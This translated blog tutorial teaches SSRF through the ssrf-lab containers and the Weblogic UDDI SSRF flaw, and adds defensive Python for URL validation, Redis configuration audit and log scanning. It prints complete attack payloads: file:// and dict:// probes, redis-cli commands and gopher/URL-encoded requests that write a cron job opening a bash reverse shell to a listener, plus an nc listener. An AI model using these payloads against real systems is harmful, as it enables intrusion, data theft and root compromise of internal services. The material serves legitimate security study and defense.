Studying SSRF vulnerabilities with ssrf-lab and a real-world vulnerability (Weblogic SSRF)

Preface:

This article first appeared on the Xianzhi (先知) community as "Studying SSRF vulnerabilities with ssrf-lab and a real-world vulnerability".

Learning something new: this time I use the Weblogic SSRF vulnerability together with ssrf-lab to study SSRF vulnerabilities.

0x00 Understanding SSRF

SSRF overview:

SSRF (Server-Side Request Forgery) is an attack in which the attacker forges requests that are initiated by the server itself. Because the request originates from the server, it bypasses the restriction that a client cannot reach certain data directly; in essence SSRF belongs to the information-disclosure class of vulnerabilities.

SSRF vulnerability principle:

SSRF mostly arises because the server offers a feature that fetches data from other servers, and the application neither filters nor restricts the destination address. Examples are fetching the text of a web page at a given URL, loading an image from a given address, or downloading a file. In most web architectures the web server can reach both the Internet and the internal network it sits on, so an attacker can supply an address and make the back-end server initiate a request to it and return the response data to the attacker.

In general the target of an SSRF attack is an internal system that cannot be reached from the outside network (i.e. the intranet), so an SSRF vulnerability can be summed up in one sentence: using a service that can initiate network requests as a springboard to attack other internal services.

The gopher and dict protocols, the redis service, and the curl command

The Gopher protocol can do many things and plays an important role in many SSRF cases. With it one can attack FTP, Telnet, Redis and Memcache services on the internal network, and it can also carry GET and POST requests.

DICT is the Dictionary Server Protocol (RFC 2229), which lets clients query multiple dictionaries over one connection; the server listens on port 2628.

The redis service listens on port 6379 by default.

Knowing these ports and protocols, their usefulness becomes clear in the practice below.

The curl command plays a very important role in SSRF vulnerabilities, so here is a brief introduction:

curl is a commonly used command-line tool for sending requests to web servers. Its name means "client URL", i.e. a client-side tool for URLs.

With no parameters, curl issues a GET request:

$ curl https://www.example.com

The command above issues a GET request to www.example.com, and the content returned by the server is printed on the command line.

The -v parameter prints the entire communication process for debugging. We can combine -v with different URL schemes to read files and talk to services:

Using the file protocol:   curl -v file:///etc/passwd
Using the ftp protocol:    curl -v "ftp://127.0.0.1:port/info"
Using the dict protocol:   curl -v "dict://127.0.0.1:port/info"
Using the gopher protocol: curl -v "gopher://127.0.0.1:port/_info"

For other parameters, refer to the curl documentation.

Common internal IP ranges

Private (LAN) address space falls into three classes, with the following IP ranges:

Class C: 192.168.0.0 - 192.168.255.255

Class B: 172.16.0.0 - 172.31.255.255

Class A: 10.0.0.0 - 10.255.255.255
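The principle described above (the server fetches whatever URL it is handed) and the private ranges just listed point to the natural mitigation: validate the destination before the server-side fetch is made. The following is an added example, not code from the article or from ssrf-lab. It assumes a policy in which only http and https on ports 80 and 443 are permitted, and every address the hostname resolves to is checked against the loopback, link-local and RFC 1918 ranges. The resolver is injectable so the check can be exercised offline with a constructed address table.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy (not from the article): only http/https on 80/443, and never
# an address in loopback, link-local, or the three private ranges listed above.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),       # class A private range
    ipaddress.ip_network("172.16.0.0/12"),    # class B private range
    ipaddress.ip_network("192.168.0.0/16"),   # class C private range
    ipaddress.ip_network("127.0.0.0/8"),      # loopback
    ipaddress.ip_network("169.254.0.0/16"),   # link-local (cloud metadata lives here)
    ipaddress.ip_network("::1/128"),          # IPv6 loopback
    ipaddress.ip_network("fc00::/7"),         # IPv6 unique-local
    ipaddress.ip_network("fe80::/10"),        # IPv6 link-local
]


def is_blocked_ip(ip_str):
    """True if the address falls in a range the server must never fetch from."""
    ip = ipaddress.ip_address(ip_str)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 is still 10.0.0.1
    return any(ip in net for net in BLOCKED_NETWORKS)


def static_resolver(table):
    """Build a getaddrinfo-like resolver from a constructed {host: [ip, ...]} table.
    Used so the example runs offline; IP literals resolve to themselves."""
    def resolve(host, port):
        try:
            ipaddress.ip_address(host)
            return [(None, None, None, "", (host, port))]
        except ValueError:
            pass
        if host not in table:
            raise socket.gaierror("constructed resolver has no record for %s" % host)
        return [(None, None, None, "", (ip, port)) for ip in table[host]]
    return resolve


def validate_webhook_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason) for a user-supplied URL the server is asked to fetch."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    # Check every address the name maps to; one internal record is enough to refuse.
    try:
        infos = resolver(host, port)
    except (socket.gaierror, OSError):
        return False, "cannot resolve host"
    for addr in {info[4][0] for info in infos}:
        if is_blocked_ip(addr):
            return False, "resolves to internal address %s" % addr
    return True, "ok"


if __name__ == "__main__":
    # Constructed address table so the demo does not touch real DNS.
    demo = static_resolver({"hooks.example.com": ["93.184.216.34"],
                            "rebind.example.com": ["93.184.216.34", "10.0.0.8"]})
    for candidate in ("https://hooks.example.com/events", "file:///etc/passwd",
                      "dict://127.0.0.1:6379/info", "http://172.18.0.2:6379/",
                      "http://rebind.example.com/"):
        print(candidate, "->", validate_webhook_url(candidate, demo))
```

The fetch that follows validation should connect to the address that was checked rather than resolving the name a second time, otherwise a DNS answer that changes between the check and the request defeats it; any redirect returned by the remote server has to go through the same validation before it is followed.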

Finding and exploiting SSRF vulnerabilities:

Sites with SSRF vulnerabilities are mainly exploited through four protocols: http, file, gopher and dict.

The file protocol reads local files.
The http protocol scans IP addresses and probes ports on the internal network.
If port 6379 is found open, the http, gopher and dict protocols can be used against the redis service on that port.

As the figure shows, there are many ways to find and exploit SSRF. Theory alone is not enough to understand them, so we practise below:

0x01 ssrf-lab

The OUTGOING WEBHOOK input (https://yourhandler.io/events) is the REST API endpoint to be monitored; this is the item under test.
The SEE THE RESULT section shows the response to the request and its status code.

First test 127.0.0.1: the data is echoed back, which shows that internal IP addresses are not restricted.
As explained above, SSRF can read files through several protocols, so test that here:

Using file:///etc/passwd reads the user list, and the read succeeds.
Beyond that, this protocol can read any file on the host, so configuration files and source code can be read easily for further penetration. It succeeds here because there is no strict URL filtering, so the protocol can be used to read arbitrary files.

The redis service was introduced above, and many SSRF write-ups combine the protocols with Redis, so first install the service inside the ssrf-basics container:

$ docker ps                                  # look up the container ID
$ docker exec -it <container-id> /bin/bash   # enter the container
$ apt-get install redis-server               # install the redis service
$ redis-server                               # start the redis service

After installation, the protocols can be used to gather information and obtain a reverse shell.

Using the dict protocol, dict://127.0.0.1:6379/info retrieves the configuration information of the local redis service.
Using dict://127.0.0.1:6379/KEYS * retrieves the contents stored in redis.
That is the simple use of the dict protocol; in addition, the gopher protocol can be used to attack redis.

Redis on the internal network may suffer from unauthorized access: when the Redis service runs with root privileges, attacking the internal Redis through the Gopher protocol can write a scheduled task (cron job) and thereby obtain a reverse shell.
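The precondition of the attack just described is a Redis instance that anyone on the network can reach and reconfigure without a password. As an added example (not part of the article or of the Redis project), the following Python audits a redis.conf for the settings that make that possible; both configuration texts are constructed for the example, and the password in the hardened one is a placeholder.

```python
# Constructed example of a redis.conf in the state the article attacks:
# reachable from the whole network, no authentication, CONFIG available.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

# Constructed hardened counterpart: local only, protected mode, a password,
# and the commands the attack relies on renamed away (CHANGE-ME is a placeholder).
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_conf(text):
    """Return {directive: [value, ...]} for uncommented lines.
    Directives that may repeat (rename-command) keep every value."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text):
    """Return a list of finding strings; an empty list means none of the checked weaknesses is present."""
    conf = parse_conf(text)
    findings = []

    # Redis listens on all interfaces when no 'bind' directive is present.
    binds = conf.get("bind", ["0.0.0.0"])
    bind_tokens = {token for value in binds for token in value.split()}
    if bind_tokens & {"0.0.0.0", "*", "::"}:
        findings.append("bind: listens on all interfaces")

    # protected-mode defaults to yes; disabling it removes the no-password guard.
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")

    if "requirepass" not in conf:
        findings.append("requirepass: no password set")

    # CONFIG (to change dir/dbfilename) and FLUSHALL are what the cron-write attack uses.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in renamed:
            findings.append("rename-command: %s still reachable" % cmd)
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(text) or ["no findings"])
```

The audit covers only the configuration file; the other precondition the article names, Redis running as root, is an operating-system matter (run it as a dedicated unprivileged user so a written dump file cannot land in /var/spool/cron or /etc).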

First look at the Redis commands used in a normal attack, and then convert them into a usable Gopher protocol URL:

redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
// redis-cli: list all keys and clear all data

This is the common exploit; simply change the IP and port to your own. Adapted into a Gopher protocol URL:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

After URL decoding it reads:

gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit

Tested, and the result is echoed back.
Then view the inserted KEY value inside the ssrf-lab/basics container to verify that it succeeded.
The Gopher protocol can also be used to attack FastCGI and vulnerable web applications on the internal network.

For details, refer to "Using the Gopher protocol to expand the attack surface".

0x02: Weblogic SSRF Vulnerability

Weblogic has an SSRF vulnerability. Exploiting it allows arbitrary HTTP requests to be sent, which can then be used to attack redis, fastcgi and other vulnerable components on the internal network.

The vulnerability is located at http://192.168.186.130:7001/uddiexplorer//uddiexplorer/SearchPublicRegistries.jsp. Translating the page with Google: it searches a private registry, and above it there is a public registry where Microsoft or IBM can be chosen, i.e. the page fetches the text content of a web page at a specified URL.

Fill in any content and submit: the request turns out to be a GET request (POST requests can also be constructed directly), so the parameters can be constructed by hand. Change the specified URL a little and see what the result looks like; first work out which parameter corresponds to each field.

Constructed parameters:

?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

Initiate the request and observe:
For a port that is reachable, an error with a status code is generally returned; if the port is not open, it returns "could not connect over HTTP to server".
In this way the state of the internal network can be probed.

In addition, the Weblogic SSRF has one notable feature: although it is a GET request, %0a%0d can be passed to inject newlines. Since redis commands are separated from one another by line breaks, a redis server on the internal network can be attacked through this SSRF.

Since it can be attacked through SSRF, inject the commands via the HTTP request and use Redis to obtain a reverse shell.

First probe for redis servers on the internal network through the SSRF; testing found that 172.18.0.2:6379 was reachable (docker is used here, and the docker network built is generally 172.*; my own request kept timing out, so the screenshots from the original write-up are used for now).
Thus we know the docker environment address is 172.18.0.2, and port 6379 is running a Redis service.

Then send three redis commands that write the reverse-shell script into /etc/crontab:

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.186.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

Passed in via GET, URL-encoded:

%74%65%73%74%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%36%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%73%61%76%65%61%61%61
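The newline characters the request above smuggles through the GET parameter, together with non-http schemes and internal targets in the operator parameter, all survive in the web server's access log, which is where a defender would look for this activity. As an added example (not from the article), the following Python scans constructed access-log lines for those indicators. The log format, the parameter handling and the parameter names are assumptions; the Weblogic path is taken from the article, and the log lines themselves are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from the article): a benign registry search,
# a probe of an internal host on the redis port, a request carrying
# newline-separated redis commands, and a non-http scheme.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=acme&operator=http://uddi.example.com/inquire HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=x&operator=http://172.18.0.2:6379 HTTP/1.1" 200 391',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&operator=http://172.18.0.2:6379/%0d%0aconfig%20set%20dir%20/etc/%0d%0a HTTP/1.1" 200 391',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&operator=dict://127.0.0.1:6379/info HTTP/1.1" 200 120',
]

# Assumed combined-log layout: the request line sits in double quotes.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Redis administrative commands that have no business inside a URL parameter.
REDIS_CMD_RE = re.compile(r"\b(config\s+set|flushall|dbfilename|slaveof)\b", re.IGNORECASE)


def host_is_internal(host):
    """True for loopback, link-local and private addresses, or the name localhost."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local


def inspect_param_value(value):
    """Return the reasons a decoded parameter value looks like an SSRF attempt (empty if none)."""
    reasons = []
    decoded = unquote(value)  # a second decode also catches double-encoded payloads
    if "\r" in decoded or "\n" in decoded:
        reasons.append("CRLF in parameter")
    if REDIS_CMD_RE.search(decoded):
        reasons.append("redis command text")
    parts = urlsplit(decoded)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            reasons.append("scheme %s" % parts.scheme.lower())
        if parts.hostname and host_is_internal(parts.hostname):
            reasons.append("internal host %s" % parts.hostname)
    return reasons


def scan_log(lines):
    """Return [(line_number, [reason, ...]), ...] for every request with a suspicious parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        reasons = []
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons.extend("%s: %s" % (name, r) for r in inspect_param_value(value))
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (number, "; ".join(reasons)))
```

Every parameter is inspected rather than only operator, because the same fetch-a-URL feature usually exists under other names elsewhere in an application; the match on redis command text is deliberately narrow so that ordinary searches containing the word "save" are not flagged.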

Before initiating the request, listen on port 4444:

nc -lvp 4444

After the request, wait a moment and the shell is received successfully.

A small problem appeared during reproduction: accessing http://172.18.0.2:6379/ timed out. But the purpose of reproducing this vulnerability was also to learn SSRF, and in a word something was learned at this point, so the reproduction was not in vain.



Origin blog.csdn.net/qq_43431158/article/details/103169502